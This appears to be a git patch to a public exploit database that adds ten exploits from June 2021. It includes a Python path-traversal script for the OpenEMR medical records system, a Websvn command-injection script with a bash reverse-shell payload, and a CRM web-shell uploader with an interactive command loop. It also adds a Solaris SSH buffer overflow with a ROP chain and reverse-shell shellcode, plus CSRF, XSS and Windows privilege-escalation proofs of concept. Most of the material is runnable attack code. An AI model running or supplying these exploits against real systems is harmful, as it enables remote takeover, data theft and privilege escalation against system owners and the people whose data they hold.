From 033645d201050bd37ff31587335db540b2e2d9e3 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 22 Jun 2021 05:01:54 +0000 Subject: [PATCH] DB: 2021-06-22 10 changes to exploits/shellcodes Wise Care 365 5.6.7.568 - 'WiseBootAssistant' Unquoted Service Path iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path Remote Mouse GUI 3.008 - Local Privilege Escalation Solaris SunSSH 11.0 x86 - libpam Remote Root (3) OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) Simple CRM 3.0 - 'Change user information' Cross-Site Request Forgery (CSRF) Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS) Websvn 2.6.0 - Remote Code Execution (Unauthenticated) Customer Relationship Management System (CRM) 1.0 - Remote Code Execution --- exploits/php/webapps/50037.py | 129 +++++++++++++++++++++++++++++++ exploits/php/webapps/50042.py | 30 +++++++ exploits/php/webapps/50043.html | 28 +++++++ exploits/php/webapps/50044.txt | 55 +++++++++++++ exploits/php/webapps/50046.txt | 58 ++++++++++++++ exploits/solaris/remote/50039.py | 55 +++++++++++++ exploits/windows/local/50038.txt | 39 ++++++++++ exploits/windows/local/50040.txt | 39 ++++++++++ exploits/windows/local/50045.txt | 38 +++++++++ exploits/windows/local/50047.txt | 19 +++++ files_exploits.csv | 10 +++ 11 files changed, 500 insertions(+) create mode 100755 exploits/php/webapps/50037.py create mode 100755 exploits/php/webapps/50042.py create mode 100644 exploits/php/webapps/50043.html create mode 100644 exploits/php/webapps/50044.txt create mode 100644 exploits/php/webapps/50046.txt create mode 100755 exploits/solaris/remote/50039.py create mode 100644 exploits/windows/local/50038.txt create mode 100644 exploits/windows/local/50040.txt create mode 100644 exploits/windows/local/50045.txt create mode 100644 exploits/windows/local/50047.txt diff --git a/exploits/php/webapps/50037.py b/exploits/php/webapps/50037.py new file mode 100755 index 000000000..365bc8871 --- /dev/null +++ b/exploits/php/webapps/50037.py @@ -0,0 +1,129 @@ +# Exploit Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) +# Date 16.06.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip +# Version: All versions prior to 5.0.2 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2019-14530 +# CWE: CWE-22 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2019-14530-Exploit/README.md +# Reference: https://raw.githubusercontent.com/Wezery/CVE-2019-14530/master/Path%20traversal%20and%20DoS.pdf + +''' +Description: +An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. +An authenticated attacker can download any file (that is readable by the user www-data) +from server storage. If the requested file is writable for the www-data user and the directory +/var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server. +''' + + +''' +Banner: +''' +banner = """ + + + ______ _______ ____ ___ _ ___ _ _ _ ____ _____ ___ + / ___\ \ / / ____| |___ \ / _ \/ |/ _ \ / | || || ___|___ / / _ \ +| | \ \ / /| _| _____ __) | | | | | (_) |_____| | || ||___ \ |_ \| | | | +| |___ \ V / | |__|_____/ __/| |_| | |\__, |_____| |__ _|__) |__) | |_| | + \____| \_/ |_____| |_____|\___/|_| /_/ |_| |_||____/____/ \___/ + + by Hacker5preme + +""" +print(banner) + + +''' +Import required modules: +''' +import requests +import argparse + + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='OpenEMR Path Traversal') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +my_parser.add_argument('-u', '--USERNAME', type=str) +my_parser.add_argument('-p', '--PASSWORD', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +openemr_path = args.PATH +username = args.USERNAME +password = args.PASSWORD +print('') +Filepath = input('[+] Filepath: ') + + +''' +Authentication: +''' +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default' + +# Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1' +} + +# Body: +body = { + 'new_login_session_management': '1', + 'authProvider': 'Default', + 'authUser': username, + 'clearPass': password, + 'languageChoice': '1' +} + +# Authenticate: +print('') +auth = session.post(auth_url, headers=header, data=body) +if 'error=1&site=' in auth.text: + print('[-] Authentication failed') + exit() +else: + print('[+] Authentication successfull: ' + str(auth)) + + +''' +Path Traversal: +''' +url_static = 'http://' + target_ip + ':' + target_port + openemr_path +url_dynamic = '/custom/ajax_download.php?fileName=../../../../../../../../..' +url_exploit = url_static + url_dynamic + Filepath +print('') +print('[+] Constructed malicious URL: ') + +# Headers: +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1' +} + +# Exploit: +print('') +print('[+] Contents of ' + Filepath + ':') +print('') +getfile = session.get(url_exploit, headers = header) +print(getfile.text) \ No newline at end of file diff --git a/exploits/php/webapps/50042.py b/exploits/php/webapps/50042.py new file mode 100755 index 000000000..139118d53 --- /dev/null +++ b/exploits/php/webapps/50042.py @@ -0,0 +1,30 @@ +# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated) +# Date: 20/06/2021 +# Exploit Author: g0ldm45k +# Vendor Homepage: https://websvnphp.github.io/ +# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0 +# Version: 2.6.0 +# Tested on: Docker + Debian GNU/Linux (Buster) +# CVE : CVE-2021-32305 + +import requests +import argparse +from urllib.parse import quote_plus + +PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'" +REQUEST_PAYLOAD = '/search.php?search=";{};"' + +parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.') +parser.add_argument('target', type=str, help="Target URL.") + +args = parser.parse_args() + +if args.target.startswith("http://") or args.target.startswith("https://"): + target = args.target +else: + print("[!] Target should start with either http:// or https://") + exit() + +requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD))) + +print("[*] Request send. Did you get what you wanted?") \ No newline at end of file diff --git a/exploits/php/webapps/50043.html b/exploits/php/webapps/50043.html new file mode 100644 index 000000000..35565b044 --- /dev/null +++ b/exploits/php/webapps/50043.html @@ -0,0 +1,28 @@ +# Exploit Title: Simple CRM 3.0 - 'Change user information' Cross-Site Request Forgery (CSRF) +# Date: 20/06/2021 +# Exploit Author: Riadh Benlamine (rbn0x00) +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/small-crm-php/ +# Version: 3.0 +# Category: Webapps +# Tested on: Apache2+MariaDB latest version +# Description : Simple CRM suffers from Cross-site request forgery, which the attacker can manipulate user data via triggering user to visit suspicious url + +Vulnerable page: /crm/profile.php + +POC: +---- + + + +
+ + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/50044.txt b/exploits/php/webapps/50044.txt new file mode 100644 index 000000000..61e31d390 --- /dev/null +++ b/exploits/php/webapps/50044.txt @@ -0,0 +1,55 @@ +# Exploit Title: Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS) +# Date: 20/06/2021 +# Exploit Author: Riadh Benlamine (rbn0x00) +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/small-crm-php/ +# Version: 3.0 +# Category: Webapps +# Tested on: Apache2+MariaDB latest version +# Description : Simple CRM suffers from Cross-site scripting, allowing authenticated attackers to obtain administrator cookies. + +Vunlerable page: /crm/profile.php + +POC: +---- +POST /crm/profile.php HTTP/1.1 +Host: localhost +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; +boundary=---------------------------386571683933745493952831205283 +Content-Length: 779 +Origin: http://localhost +Connection: close +Referer: http://localhost/crm/profile.php +Cookie: PHPSESSID=l0iqlrmehhcasinv0ip09e3ls1 +Upgrade-Insecure-Requests: 1 + +-----------------------------386571683933745493952831205283 +Content-Disposition: form-data; name="name" + +-----------------------------386571683933745493952831205283 + +Content-Disposition: form-data; name="alt_email" + +-----------------------------386571683933745493952831205283 + +Content-Disposition: form-data; name="phone" +0123456789 + +-----------------------------386571683933745493952831205283 + +Content-Disposition: form-data; name="gender" +m + +-----------------------------386571683933745493952831205283 + +Content-Disposition: form-data; name="address" + +-----------------------------386571683933745493952831205283 + +Content-Disposition: form-data; name="update" +Update + +-----------------------------386571683933745493952831205283-- \ No newline at end of file diff --git a/exploits/php/webapps/50046.txt b/exploits/php/webapps/50046.txt new file mode 100644 index 000000000..b90903f69 --- /dev/null +++ b/exploits/php/webapps/50046.txt @@ -0,0 +1,58 @@ +# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Remote Code Execution +# Date: 21.06.2021 +# Exploit Author: Ishan Saha +# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip +# Version: 1.x +# Tested on: Ubuntu + +# REQUREMENTS # +# run pip3 install requests colorama beautifulsoup4 + +# DESCRIPTION # + +# # Customer relationship management system is vulnerable to malicious file upload on account update option & customer create option + +# # Exploit Working: +# # 1. Starting a session with the server +# # 2. Registering a user hackerctf : hackerctf and adding payload in image +# # 3. Finding the uploaded file location in the username image tag +# # 4. Runing the payload file to give a shell + + +#!/usr/bin/python3 +import requests , time +from bs4 import BeautifulSoup as bs +from colorama import Fore, Back, Style + +# Variables : change the URL according to need +URL="http://192.168.0.245/crm/" # CHANGE THIS +shellcode = "" +filename = "shell.php" +content_data = {"id":"","firstname":"ishan","lastname":"saha","username":"hackerctf","password":"hackerctf"} +authdata={"username":"hackerctf","password":"hackerctf"} +def format_text(title,item): + cr = '\r\n' + section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr + item=str(item) + text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET + return text + +ShellSession = requests.Session() +response = ShellSession.post(URL+"classes/Users.php?f=create_customer",data=content_data ,files={"img":(filename,shellcode,"application/php")}) +response = ShellSession.post(URL+"classes/Login.php?f=clogin",data=authdata) +response = ShellSession.get(URL + "customer/") +soup = bs(response.text,"html.parser") +location= soup.find('img')['src'] + +#print statements +print(format_text("Target",URL),end='') +print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='') +print(format_text("shell location",location),end='') +print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!")) + +while True: + cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET) + if cmd == 'exit': + break + print(ShellSession.get(location + "?cmd="+cmd).content.decode()) \ No newline at end of file diff --git a/exploits/solaris/remote/50039.py b/exploits/solaris/remote/50039.py new file mode 100755 index 000000000..aa4e527a6 --- /dev/null +++ b/exploits/solaris/remote/50039.py @@ -0,0 +1,55 @@ +# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (3) +# Exploit Author: Nathaniel Singer, Joe Rozner +# Date: 09/11/2020 +# CVE: 2020-14871 + +# Vulnerable Version(s): Oracle Solaris: 9 (some releases), 10 (all releases), 11.0 +# Description: CVE-2020-14871 is a critical pre-authentication (via SSH) stack-based buffer overflow vulnerability in the Pluggable Authentication Module (PAM) in Oracle Solaris. PAM is a dynamic authentication component that was integrated into Solaris back in 1997 as part of Solaris 2.6. The vulnerability received a CVSSv3 score of 10.0, the maximum possible score. + +# Vendor Homepage: https://www.oracle.com/solaris +# Software Link: https://www.oracle.com/solaris/solaris10/downloads/solaris10-get-jsp-downloads.html +# Tested on: Software Hash (md5): aae1452bb3d56baa3dcb8866ce7e4a08 2254110720: sol-10-u11-ga-x86-dvd.iso + +# Notes: We ran into an interesting LIBC descrepancy during testing. The sysenter gadget (0xfebbbbf4), last in the stage one chain, was accessible when the testing VM was running on a MacOS host, however, when we ran the vulnerable Solaris box on a Windows host, that gadget was not located at the same address and we actually were unable to find it anywhere in memory. Hopefully someone smarter than us can figure out why this is, but you may run into this during your testing as well. + +#!/usr/bin/python3 + +from pwn import * + +########## BUILD ########## +# mprotect shellcode, stage one to mark the page containing our shellcode as executable +buf = b"\x31\xc0\x31\xc9\xbb\x01\x40\x04\x08\x66\xb8\x01\x40" +buf += b"\xb1\x07\x4b\x48\x51\x50\x53\x53\x89\xe1\x31\xc0\xb0" +buf += b"\x74\xcd\x91" + +# Actual stage two shellcode, drop into after mprotect call +# ./msfvenom -p solaris/x86/shell_reverse_tcp -b "\x20\x09\x00\x0d\x0a" LHOST="192.168.1.215" LPORT=4444 -f python +buf += b"" +pad = b'A'* (512-len(buf)) + +# manual assembly of ROP chain due to pwntools chainer bugs, DWORD returns :/ +g = [] +g.append(p32(0x080431c3)) #ebp overwrite to prevent ecx corrupt and crash +g.append(p32(0xfed86ca3)) #mov eax, 0x74; ret +g.append(p32(0x08072829)) #pop ebx; ret +g.append(p32(0x08040101)) #write ecx value (0x0a) to address, prevents crash +g.append(p32(0x0805ba07)) #pop ecx; pop edx; pop ebp +g.append(p32(0x08046ee0)) #ptr(0x?,0x0x1000,0x7) +g.append(p32(0x08043001)) #edx pointer to page+1 for mprotect +g.append(p32(0x080431b8)) #unused ebp value +g.append(p32(0x08072261)) #decrement edx so correct page addr +g.append(p32(0xfefe2d8b)) #mov DWORD PTR [ecx+0x4],edx; xor eax; ret +g.append(p32(0xfed86ca3)) #mov eax, 0x74; ret +g.append(p32(0x0805ba08)) #pop edx; pop ebp; ret +g.append(p32(0x080431b8)) #addr of shellcode +g.append(p32(0xfed86ca3)) #unused ebx value +g.append(p32(0xfebb56f6)) #sysenter (ret into sc via edx) +chain = b''.join(g) #assemble the list into a bytestring, final rop chain +print(f"Sending Exploit: {chain}") + +########## EXPLOIT ########## +remote_host = "192.168.25.130” +io = process(f'/usr/bin/ssh -l \"\" -o \"PreferredAuthentications keyboard-interactive\" {remote_host}', shell=True, stdin=PTY) + +io.recv() #username prompt +io.sendline(buf + pad + chain) #exploit \ No newline at end of file diff --git a/exploits/windows/local/50038.txt b/exploits/windows/local/50038.txt new file mode 100644 index 000000000..fb61b34b6 --- /dev/null +++ b/exploits/windows/local/50038.txt @@ -0,0 +1,39 @@ +# Exploit Title: Wise Care 365 5.6.7.568 - 'WiseBootAssistant' Unquoted Service Path +# Date: 2021-06-18 +# Exploit Author: Julio Aviña +# Vendor Homepage: https://www.wisecleaner.com/wise-care-365.html +# Software Link: https://downloads.wisecleaner.com/soft/WiseCare365_5.6.7.568.exe +# Version: 5.6.7.568 +# Service File Version 1.2.4.54 +# Tested on: Windows 10 Pro x64 es +# Vulnerability Type: Unquoted Service Path + + +# 1. To find the unquoted service path vulnerability + +C:\>wmic service where 'name like "%WiseBootAssistant%"' get displayname, pathname, startmode, startname + +DisplayName PathName StartMode StartName +Wise Boot Assistant C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe Auto LocalSystem + +# 2. To check service info: + +C:\>sc qc "WiseBootAssistant" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: WiseBootAssistant + TIPO : 110 WIN32_OWN_PROCESS (interactive) + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Wise Boot Assistant + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + + +# 3. Exploit: + +A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application. +When restarting the service or the system, the inserted executable will run with elevated privileges. \ No newline at end of file diff --git a/exploits/windows/local/50040.txt b/exploits/windows/local/50040.txt new file mode 100644 index 000000000..e111e9bfd --- /dev/null +++ b/exploits/windows/local/50040.txt @@ -0,0 +1,39 @@ +# Exploit Title: iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path +# Date: 2021-06-18 +# Exploit Author: Julio Aviña +# Vendor Homepage: https://www.i-funbox.com/en/index.html +# Software Link: https://www.i-funbox.com/download/ifunbox_setup_4.2.exe +# Version: 4.2 +# Service File Version: 486.0.2.23 +# Tested on: Windows 10 Pro x64 es +# Vulnerability Type: Unquoted Service Path + + +# 1. To find the unquoted service path vulnerability + +C:\>wmic service where 'name like "%Apple Mobile Device Service%"' get displayname, pathname, startmode, startname + +DisplayName PathName StartMode StartName +Apple Mobile Device Service C:\Program Files (x86)\i-Funbox DevTeam\Mobile Device Support\AppleMobileDeviceService.exe Auto LocalSystem + +# 2. To check service info: + +C:\>sc qc "Apple Mobile Device Service" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Apple Mobile Device Service + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\i-Funbox DevTeam\Mobile Device Support\AppleMobileDeviceService.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Apple Mobile Device Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + + +# 3. Exploit: + +A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application. +When restarting the service or the system, the inserted executable will run with elevated privileges. \ No newline at end of file diff --git a/exploits/windows/local/50045.txt b/exploits/windows/local/50045.txt new file mode 100644 index 000000000..f308c2afb --- /dev/null +++ b/exploits/windows/local/50045.txt @@ -0,0 +1,38 @@ +# Exploit Title: Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path +# Date: 2021-06-20 +# Exploit Author: Julio Aviña +# Vendor Homepage: https://www.lexmark.com/ +# Software Link: https://downloads.lexmark.com/downloads/drivers/Lexmark_Printer_Software_G2_Installation_Package_01292021.exe +# Version: 1.8.0.0 +# Tested on: Windows 10 Pro x64 es +# Vulnerability Type: Unquoted Service Path + + +# 1. To find the unquoted service path vulnerability + +C:\>wmic service where 'name like "%LM__bdsvc%"' get displayname, pathname, startmode, startname + +DisplayName PathName StartMode StartName +Lexmark Communication System C:\Program Files\Lexmark\Bidi\LM__bdsvc.exe Auto LocalSystem + +# 2. To check service info: + +C:\>sc qc "LM__bdsvc" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: LM__bdsvc + TIPO : 110 WIN32_OWN_PROCESS (interactive) + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\Lexmark\Bidi\LM__bdsvc.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Lexmark Communication System + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + + +# 3. Exploit: + +A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application. +When restarting the service or the system, the inserted executable will run with elevated privileges. \ No newline at end of file diff --git a/exploits/windows/local/50047.txt b/exploits/windows/local/50047.txt new file mode 100644 index 000000000..008e31170 --- /dev/null +++ b/exploits/windows/local/50047.txt @@ -0,0 +1,19 @@ +# Exploit Title: Remote Mouse GUI 3.008 - Local Privilege Escalation +# Exploit Author: Salman Asad (@deathflash1411) +# Date: 17.06.2021 +# Version: Remote Mouse 3.008 +# Tested on: Windows 10 Pro Version 21H1 + +# Note: Local/RDP access is required to exploit this vulnerability + +This method is also known as Citrix Method (Insecure GUI App) +After installation remote mouse runs as administrator and autostarts by default + +PoC: + +Open remote mouse from the system tray +Go to Settings +Click "Change..." in the "Image Transfer Folder" area +Save As prompt will appear +Enter "C:\Windows\System32\cmd.exe" +Command Prompt is spawned with administrator privileges \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 872015c5d..ec004e8c1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11375,6 +11375,10 @@ id,file,description,date,author,type,platform,port 50025,exploits/windows/local/50025.txt,"Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows, 50026,exploits/windows/local/50026.txt,"VX Search 13.5.28 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows, 50028,exploits/windows/local/50028.txt,"Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path",2021-06-17,"Ismael Nava",local,windows, +50038,exploits/windows/local/50038.txt,"Wise Care 365 5.6.7.568 - 'WiseBootAssistant' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows, +50040,exploits/windows/local/50040.txt,"iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows, +50045,exploits/windows/local/50045.txt,"Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows, +50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -18510,6 +18514,7 @@ id,file,description,date,author,type,platform,port 49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",2021-05-26,Shellbr3ak,remote,linux, 49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",2021-06-03,sirpedrotavares,remote,hardware, 50034,exploits/hardware/remote/50034.txt,"Dlink DSL2750U - 'Reboot' Command Injection",2021-06-18,"Mohammed Hadi",remote,hardware, +50039,exploits/solaris/remote/50039.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (3)",2021-06-21,"Nathaniel Singer",remote,solaris, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -44185,3 +44190,8 @@ id,file,description,date,author,type,platform,port 50031,exploits/php/webapps/50031.txt,"ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF)",2021-06-18,"Piyush Patil",webapps,php, 50032,exploits/php/webapps/50032.xml,"ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS)",2021-06-18,"Piyush Patil",webapps,php, 50036,exploits/nodejs/webapps/50036.js,"Node.JS - 'node-serialize' Remote Code Execution (3)",2021-06-18,"Beren Kuday GÖRÜN",webapps,nodejs, +50037,exploits/php/webapps/50037.py,"OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated)",2021-06-21,"Ron Jost",webapps,php, +50043,exploits/php/webapps/50043.html,"Simple CRM 3.0 - 'Change user information' Cross-Site Request Forgery (CSRF)",2021-06-21,"Riadh Benlamine",webapps,php, +50044,exploits/php/webapps/50044.txt,"Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)",2021-06-21,"Riadh Benlamine",webapps,php, +50042,exploits/php/webapps/50042.py,"Websvn 2.6.0 - Remote Code Execution (Unauthenticated)",2021-06-21,g0ldm45k,webapps,php, +50046,exploits/php/webapps/50046.txt,"Customer Relationship Management System (CRM) 1.0 - Remote Code Execution",2021-06-21,"Ishan Saha",webapps,php,